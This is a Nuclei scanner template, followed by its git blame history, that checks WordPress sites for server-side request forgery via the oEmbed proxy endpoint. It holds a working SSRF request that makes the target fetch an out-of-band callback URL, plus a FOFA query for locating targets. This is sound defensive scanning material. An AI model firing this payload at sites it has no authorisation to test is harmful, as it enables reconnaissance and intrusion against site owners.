nuclei-templates/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

id: wordpress-ssrf-oembed

info:
  name: Wordpress Oembed Proxy - Server-side request forgery
  author: dhiyaneshDk
  severity: medium
  description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
  reference:
    - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  metadata:
    max-request: 2
    fofa-query: body="oembed" && body="wp-"
  tags: wordpress,ssrf,oast,oembed

http:
  - raw:
      - |
        GET /wp-json/oembed/1.0/proxy HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'rest_missing_callback_param'

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`id: wordpress-ssrf-oembed`

			`info:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 18:13:10 +00:00			`name: Wordpress Oembed Proxy - Server-side request forgery`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`author: dhiyaneshDk`
update: lint fix 2021-12-16 08:55:00 +00:00			`severity: medium`
Updated descriptions of templates 2024-01-02 15:45:12 +00:00			`description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`reference:`
			`- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress`
			`- https://github.com/incogbyte/quickpress/blob/master/core/req.go`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
TemplateMan Update [Mon Sep 4 18:22:21 UTC 2023] :robot: 2023-09-04 18:22:21 +00:00			`max-request: 2`
templateman update 2023-10-14 11:27:55 +00:00			`fofa-query: body="oembed" && body="wp-"`
Update wordpress-ssrf-oembed.yaml 2023-09-04 18:13:10 +00:00			`tags: wordpress,ssrf,oast,oembed`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 18:13:10 +00:00			`- raw:`
			`- \|`
			`GET /wp-json/oembed/1.0/proxy HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1`
			`Host: {{Hostname}}`
update: lint fix 2021-12-16 08:55:00 +00:00
fix fp wordpress-ssrf-oembed.yaml 2023-09-02 23:13:32 +00:00			`matchers-condition: and`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`matchers:`
Update wordpress-ssrf-oembed.yaml 2023-09-04 18:13:10 +00:00			`- type: word`
			`part: body_1`
			`words:`
			`- 'rest_missing_callback_param'`
fix fp wordpress-ssrf-oembed.yaml 2023-09-02 23:13:32 +00:00
Update wordpress-ssrf-oembed.yaml 2023-09-04 18:13:10 +00:00			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`
Auto Template Signing [Mon Jan 15 11:49:24 UTC 2024] :robot: 2024-01-15 11:49:24 +00:00			`# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950`